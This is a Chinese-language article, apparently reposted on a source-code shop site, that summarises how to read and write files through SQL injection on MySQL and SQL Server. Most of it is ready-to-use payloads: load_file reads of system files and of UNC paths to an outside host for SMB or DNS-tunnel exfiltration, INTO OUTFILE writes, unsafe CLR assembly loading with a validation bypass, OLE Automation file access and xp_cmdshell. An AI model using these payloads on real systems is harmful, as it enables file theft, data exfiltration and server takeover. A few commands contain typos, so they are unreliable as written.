源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

关于SQL注入中文件读写的方法总结

  • 时间:2021-03-02 23:50 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:关于SQL注入中文件读写的方法总结
[b]前言[/b] SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。 [b]一、MySQL[/b] [b]读文件 [/b] 常见的读文件,可以用16进制代替字符串
select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb协议
select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道
[b]写文件[/b] 我暂时已知l两种写文件的方式
select 0x313233 into outfile 'D:/1.txt'
select 0x313233 into dumpfile 'D:/1.txt'
[b]二、 SQL Server[/b] [b]读文件[/b] [b]1. BULK INSERT[/b]
create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';
[b]2. CLR集成[/b]
// 开启CLR集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure
create assembly sqb from 'd:\1.exe' with permission_set=unsafe
上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式
select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files
绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。
create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'
[b]3. Script.FileSystemObject[/b]
# 开启Ole Automation Procedures
 
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end
[b]写文件[/b] [b]1. Script.FileSystemObject[/b]
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'
[b]2. BCP复制文件(测试失败,无bcp.exe)[/b]
c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"
[b]3. xp_cmdshell[/b]
exec xp_cmdshell 'echo test>d:\1.txt'
[b]三、Oracle[/b] pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论 [b]总结[/b] 以上就是关于SQL注入中文件的读写方法总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流。
  • 全部评论(0)
联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部